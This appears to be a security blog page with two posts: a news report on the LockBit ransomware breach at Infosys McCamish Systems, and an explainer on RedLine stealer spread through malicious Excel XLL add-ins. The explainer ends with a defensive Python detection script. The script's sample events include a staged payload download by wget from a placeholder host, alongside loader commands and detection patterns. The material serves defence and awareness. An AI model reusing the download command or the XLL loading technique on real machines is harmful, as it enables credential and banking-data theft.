Posts with label: Banking Information

LockBit Ransomware Attack on Infosys McCamish Systems Exposes Sensitive Data of Over Six Million Individuals


Infosys McCamish Systems (IMS) recently disclosed that a LockBit ransomware attack earlier this year compromised sensitive information of more than six million individuals. IMS, a multinational corporation specializing in business consulting, IT, and outsourcing services, primarily serves the insurance and financial services industries. The company has a significant presence in the U.S., catering to large financial institutions such as Bank of America and seven of the top ten insurers in the country.

In February 2024, IMS informed the public about the ransomware attack that occurred in November 2023. Initially, the company reported that the personal data of around 57,000 Bank of America customers had been compromised. LockBit, the group responsible for the attack, claimed to have encrypted 2,000 computers within the IMS network. A recent notification to U.S. authorities revealed that the total number of affected individuals now exceeds six million. The notification outlined the steps taken by IMS, including the involvement of third-party eDiscovery experts, to conduct a thorough review of the compromised data. 

This review aimed to identify the personal information accessed and determine the individuals impacted. The compromised data includes a wide range of sensitive information, such as Social Security Numbers (SSNs), dates of birth, medical records, biometric data, email addresses and passwords, usernames and passwords, driver’s license or state ID numbers, financial account information, payment card details, passport numbers, tribal ID numbers, and U.S. military ID numbers. To mitigate the risks associated with this data exposure, IMS is offering affected individuals a free two-year identity protection and credit monitoring service through Kroll. 

The notification letters provided instructions on how to access these services. IMS has not disclosed the full list of impacted clients, but the notification mentioned Oceanview Life and Annuity Company (OLAC), an Arizona-based provider of fixed and fixed-indexed annuities, as one of the affected organizations. The list of impacted data owners may be updated as more customers request to be named in the filing. 

This breach highlights the critical importance of robust cybersecurity measures and the significant impact such attacks can have on both individuals and large financial institutions. The LockBit ransomware attack on IMS serves as a stark reminder of the vulnerabilities within the digital infrastructure of major corporations and the far-reaching consequences of data breaches.

Threat Actors are Using Malicious Microsoft Excel files to Steal Banking Credentials


Threat actors are spreading Excel XLL files that download and install the RedLine password and information-stealing malware via website contact forms and discussion forums. 

RedLine is a credential-theft malware that steals cookies, usernames and passwords, and banking details stored in web browsers, as well as FTP credentials and files from a compromised device.

The malware can also execute commands, download and run additional malware, and take screenshots of the active Windows desktop. The stolen data is sent back to the attackers to be sold on the dark web or used for other malicious activities.

XLL files are Excel add-ins. Technically they are dynamic-link libraries (DLLs) that export an 'xlAutoOpen' function, which Excel calls when the add-in is loaded. Legitimate add-ins use this mechanism to read and write data, import it from other sources, define custom functions and perform many other tasks.

However, when the malicious DLL is run manually via the regsvr32.exe command or the 'rundll32 name.xll, xlAutoOpen' command, it extracts the wget.exe program to the %UserProfile% folder and uses it to download the RedLine binary from a remote site.

Once the malware is running on the victim's machine, it searches for valuable information to steal, including credentials and credit card data stored in the Chrome, Edge, Firefox, Brave, and Opera browsers. Therefore, if you receive an email or other message distributing these types of files, simply delete the message and report it as spam.

As XLL files are executables, threat actors can use them to perform a variety of malicious behavior on a device. Users should be careful when receiving these files and should make sure they are getting the files from a trusted source before proceeding and opening them. 

According to security experts, XLL files are rarely sent as attachments; they are normally installed by another program or by a Windows administrator. Thus, any such file that arrives by email should be handled with extra caution. Aside from being vigilant with attachments and links in emails, users should also keep their endpoints secure with strong, regularly refreshed passwords and make sure their systems run safeguards such as antivirus solutions and firewalls.
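The delivery chain described above (an XLL add-in loaded by rundll32.exe or regsvr32.exe, which drops wget.exe into %UserProfile% and downloads the stealer) translates into two simple defensive checks. The Python script below is an added example, not code from the original post: it classifies mail attachments by name and PE header and scans process-creation events in a simplified "parent|image|command line" form. The attachment bytes, event lines, user name "alice", and rule names are all constructed for this example; the ".invalid" hostnames are reserved and resolve nowhere.

```python
import re
from typing import Dict, List

# Constructed sample attachments (name -> leading bytes). None of this is real malware.
SAMPLE_ATTACHMENTS: Dict[str, bytes] = {
    "invoice.xll": b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 8 + b"xlAutoOpen\x00",
    "report.xlsx": b"PK\x03\x04" + b"\x00" * 16,           # OOXML zip container, not a PE
    "notes.xll":   b"plain text with a misleading name",   # .xll name but no PE header
}

# Constructed process-creation events in the form "parent|image path|command line".
SAMPLE_EVENTS: List[str] = [
    r"explorer.exe|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Users\alice\Downloads\invoice.xll,xlAutoOpen",
    r"rundll32.exe|C:\Users\alice\wget.exe|wget.exe http://example.invalid/stage2.bin -O C:\Users\alice\AppData\Local\Temp\stage2.exe",
    r"explorer.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s C:\Users\alice\Downloads\quote.xll",
    r"explorer.exe|C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL",
    r"cmd.exe|C:\Program Files\Git\mingw64\bin\wget.exe|wget.exe https://example.invalid/release.tar.gz",
]

# A .xll path or the xlAutoOpen entry point on a rundll32/regsvr32 command line.
XLL_ARG_RE = re.compile(r"\.xll\b|xlAutoOpen", re.IGNORECASE)
# wget.exe sitting directly in a user profile, where the post says the loader drops it.
USERPROFILE_WGET_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\wget\.exe$", re.IGNORECASE)
LOADERS = {"rundll32.exe", "regsvr32.exe"}


def classify_attachment(name: str, data: bytes) -> List[str]:
    """Return the indicators an attachment exhibits (empty list = nothing notable)."""
    hits: List[str] = []
    if name.lower().endswith(".xll"):
        hits.append("xll_extension")
        # XLLs are DLLs, so a real one starts with the 'MZ' DOS header.
        if data[:2] == b"MZ":
            hits.append("pe_header")
        # Cheap stand-in for walking the PE export table: export names are stored as ASCII.
        if b"xlAutoOpen" in data:
            hits.append("xlAutoOpen_export_string")
    return hits


def classify_event(event: str) -> List[str]:
    """Return the rules a single process-creation event matches."""
    parent, image, cmdline = event.split("|", 2)
    image_name = image.rsplit("\\", 1)[-1].lower()
    hits: List[str] = []
    if image_name in LOADERS and XLL_ARG_RE.search(cmdline):
        hits.append("xll_loaded_via_lolbin")
    if image_name == "wget.exe" and USERPROFILE_WGET_RE.match(image):
        hits.append("wget_in_userprofile")
    if image_name == "wget.exe" and parent.lower() in LOADERS | {"excel.exe"}:
        hits.append("wget_spawned_by_loader")
    return hits


def scan_attachments(attachments: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Attachments that should be dropped and reported: .xll name plus a real PE header."""
    return {n: h for n, h in ((n, classify_attachment(n, d)) for n, d in attachments.items())
            if "xll_extension" in h and "pe_header" in h}


def scan_events(events: List[str]) -> Dict[str, List[str]]:
    """Map each matching event line to the rules it triggered."""
    return {e: h for e, h in ((e, classify_event(e)) for e in events) if h}


if __name__ == "__main__":
    for name, hits in scan_attachments(SAMPLE_ATTACHMENTS).items():
        print(f"attachment {name}: {', '.join(hits)}")
    for event, hits in scan_events(SAMPLE_EVENTS).items():
        print(f"event [{', '.join(hits)}]: {event}")
```

Running the script flags only invoice.xll among the attachments (notes.xll has the extension but no PE header, so it is not an add-in) and three of the five events: the two add-in loads through rundll32/regsvr32 and the wget.exe run from the user profile with a loader as parent. The ordinary Control Panel rundll32 call and the Git-bundled wget stay quiet, which is the point of keying on the .xll argument and the drop location rather than on the tool names alone.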